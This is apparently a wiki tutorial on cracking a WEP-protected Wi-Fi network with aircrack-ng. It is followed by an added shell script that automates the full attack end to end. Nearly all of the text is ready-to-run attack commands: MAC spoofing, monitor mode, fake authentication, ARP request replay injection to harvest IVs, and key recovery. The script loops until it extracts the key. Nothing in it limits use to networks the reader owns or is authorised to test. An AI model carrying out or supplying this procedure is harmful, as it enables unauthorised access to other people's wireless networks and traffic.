wep
Install software
This tutorial uses aircrack-ng, available as a Debian package or on the BackTrack live CD, now continued as Kali Linux.
Setup
We will use the following variables here:
interface=wlan1
essid=test
mac=00:11:22:33:44:55
Enable monitoring mode
This will make the device listen to all frames on the air, not only those addressed to it. The MAC is changed while the interface is down, so the spoofed address is used for the authentication and injection steps below. Note that recent versions of airmon-ng start do not put wlan1 itself into monitor mode but create a separate monitor interface (mon0 or wlan1mon, printed when it starts); if that happens, use that name as $interface in every command that follows. If NetworkManager keeps taking the card back, airmon-ng check kill stops the interfering processes first.
airmon-ng stop $interface
ifconfig $interface down
macchanger --mac $mac $interface
airmon-ng start $interface
Show all known networks
This will display all networks as they are found. You are looking for one with WEP in the ENC column.
airodump-ng $interface
Copy-paste the line of the network you want to inspect. The BSSID, CH and ESSID fields are the important bits here.
channel=7
bssid=...
Start dumping frames. Locking the card to the network's channel (-c) and filtering on its BSSID keeps the capture to the target only; -w gives the prefix of the capture files:
airodump-ng -c $channel -w $essid --bssid $bssid $interface
Inject packets
In another window:
aireplay-ng -1 0 -a $bssid -h $mac -e $essid $interface
You are looking for the following message:
Association successful
Now we need to generate more packets. This is the ARP request replay attack: aireplay-ng waits for an ARP request from the network and re-injects it over and over, so the access point answers with fresh encrypted frames, each carrying a new IV. It needs at least one client on the network to send an ARP request in the first place, so on an idle network it may sit waiting for a while:
aireplay-ng -3 -b $bssid -h $mac $interface
The #Data column in the airodump-ng window should start going up; it counts captured data frames, i.e. fresh IVs. Wait until it goes above 10 000. That can be enough for a 64-bit key; 128-bit keys usually need several tens of thousands. More is better.
Decode the packets
Now decode that dump file to find out the secret WEP key. airodump-ng appends a sequence number to the prefix given with -w, so the first capture file is $essid-01.cap, not $essid.cap:
aircrack-ng -b $bssid $essid-01.cap
The WEP key appears next to KEY FOUND!. It is printed as hex bytes separated by colons; remove the colons before entering the key in a wireless client.
Cleanup
Remove the monitoring interface:
airmon-ng stop $interface
iw dev $interface del
Otherwise NetworkManager keeps retrying the stale monitor interface and floods daemon.log.
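The whole procedure above as one script, added here as an example and not code from the original page. It keeps the tutorial's commands and variable names and adds three small helpers: capture_file picks the newest airodump-ng capture for the prefix (airodump-ng writes $essid-01.cap, -02.cap, ...), extract_key pulls the hex key out of aircrack-ng's "KEY FOUND!" line and strips the colons, and valid_wep_key checks that the result is a 40- or 104-bit key. The $mon variable and the WEP_RUN guard are assumptions of this example: set mon to the monitor interface airmon-ng creates (mon0 or wlan1mon), and set WEP_RUN=1 to actually run the attack; without it only the helpers are defined. The KEY FOUND! line in the comment is a constructed sample.

```shell
#!/bin/sh
# Added example, not part of the original tutorial. Runs the WEP procedure end to end.
# Needs root and the aircrack-ng suite; the helpers at the top need neither.

interface=${interface:-wlan1}
essid=${essid:-test}
mac=${mac:-00:11:22:33:44:55}
channel=${channel:-7}
bssid=${bssid:-00:00:00:00:00:00}   # placeholder: copy the real BSSID from airodump-ng
mon=${mon:-$interface}              # assumption: set to mon0/wlan1mon if airmon-ng creates one

# airodump-ng -w PREFIX writes PREFIX-01.cap, PREFIX-02.cap, ...; return the newest one.
capture_file() {
    ls -1 "$1"-[0-9][0-9].cap 2>/dev/null | sort | tail -n 1
}

# Read aircrack-ng output on stdin, print the key without colons.
# Constructed sample of the line it matches:
#   KEY FOUND! [ 1A:2B:3C:4D:5E ] (ASCII: .+<M^ )
extract_key() {
    sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *\].*/\1/p' | tr -d ':'
}

# WEP keys are 40 or 104 bits: 10 or 26 hex digits once the colons are gone.
valid_wep_key() {
    case $1 in
        *[!0-9A-Fa-f]*) return 1 ;;
    esac
    [ "${#1}" -eq 10 ] || [ "${#1}" -eq 26 ]
}

run_attack() {
    # Monitor mode with the spoofed MAC (tutorial commands, unchanged).
    airmon-ng stop "$interface"
    ifconfig "$interface" down
    macchanger --mac "$mac" "$interface"
    airmon-ng start "$interface"

    # Capture only the target on its channel, in the background.
    airodump-ng -c "$channel" -w "$essid" --bssid "$bssid" "$mon" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5

    # Fake authentication, then ARP request replay to drive #Data up.
    aireplay-ng -1 0 -a "$bssid" -h "$mac" -e "$essid" "$mon"
    aireplay-ng -3 -b "$bssid" -h "$mac" "$mon" >/dev/null 2>&1 &
    replay_pid=$!

    # Re-run aircrack-ng on the growing capture every minute until it reports a key;
    # it fails quietly while there are too few IVs, which is the loop's normal state.
    key=""
    while [ -z "$key" ]; do
        sleep 60
        key=$(aircrack-ng -b "$bssid" "$(capture_file "$essid")" 2>/dev/null | extract_key)
    done
    kill "$replay_pid" "$dump_pid"

    echo "WEP key (hex, no colons): $key"
    valid_wep_key "$key" || echo "warning: key is not 10 or 26 hex digits" >&2

    # Cleanup so NetworkManager does not fight over a stale monitor interface.
    airmon-ng stop "$mon"
    iw dev "$mon" del
}

# Guard: only touch hardware when explicitly asked (WEP_RUN=1 ./wep.sh).
if [ "${WEP_RUN:-0}" = 1 ]; then
    run_attack
fi
```

The polling loop replaces watching the #Data column by hand: aircrack-ng reads whatever airodump-ng has written so far, so re-running it on the growing file costs nothing and stops the replay as soon as the key is out.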
References
Inspired by lifehacker.com.